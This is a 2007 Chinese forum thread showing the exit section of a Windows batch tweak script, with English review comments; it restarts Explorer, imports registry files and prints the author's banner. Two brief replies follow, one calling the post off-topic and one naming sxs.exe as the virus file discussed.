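rem NOTE(review): errorlevel 1 from find means explorer.exe was NOT
rem listed, yet that is the case in which the tool is asked to act
rem on explorer.exe. The condition looks inverted; confirm intent.
if errorlevel 1 "%process%" -k explorer.exe
cls
goto :_EXIT
:}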
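:_EXIT
:{
rem Exit section. Resets PATH to the system directories, applies two
rem registry files, clears the variables the script declared, shows
rem the closing banner and jumps to Get_Out after a key press.
rem PATH is reset first so that the bare regedit and reg commands
rem below resolve to the copies in the Windows directories.
path=%systemroot%\system32;%systemroot%;%systemdrive%\
rem The following item tweaks the look of the Explorer window opened
rem with Win + E. The file is looked up in the current directory.
regedit /s 老板键+E更改优化.reg
rem Fixed: this import used to run after the root variable had been
rem cleared, so the path collapsed to the root of the current drive
rem and the saved environment was never restored.
reg import "%root%\environment.reg.default"
rem Undo the variables declared by the script.
set SELECT=
set regedit=
set regsvr32=
set find=
set process=
set root=
cls
@echo off
echo.
echo ▓
echo ▓ ▓ ▓▓▓ ▓▓▓▓ ▓ ▓▓▓▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓▓▓ ▓▓▓▓ ▓ ▓▓ ▓▓▓▓ ▓
echo.
echo.
echo 专注于 VB / QBasic / Turbo C 2.0 编程
echo 专注于 Registry / c盘病毒的一举一动! (此人喜欢收藏病毒 ~.~)
echo --------------------------------------------------------------------------------
echo 您可以按下任意键退出脚本程序,如果你愿意的话...
pause >nul
goto Get_Out
rem The options below are kept as spares.
rem if /i "%_EXIT%" == "1" goto :Leave_Off
rem if /i "%_EXIT%" == "2" goto :Get_Out
:}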
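:Leave_Off
rem Spare exit path, not reached by any active goto in this part of
rem the script. Opens the author's page in Internet Explorer and
rem then continues into Get_Out.
rem Fixed: this label used to start explorer.exe and call endlocal
rem itself and then fall through into Get_Out, which did both again.
start iexplore.exe http://loveskoala.blogspot.com
:Get_Out
rem Normal exit path: start the shell and end the local scope.
start explorer.exe
endlocal
rem Stop here explicitly so nothing after the script body is ever
rem read as a command.
goto :eof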
|
|
2007-7-3 20:11 |
|
|
heicai
|
『第
4 楼』:
楼上的,你的批处理看起来写的很累人, 佩服一下,但完全与楼主意思无关,离题了。难道是纯广告??
|
|
2007-7-3 21:49 |
|
|
kich
|
『第
5 楼』:
这个才是病毒文件:
sxs.exe
|
|
2007-7-9 23:26 |
|
|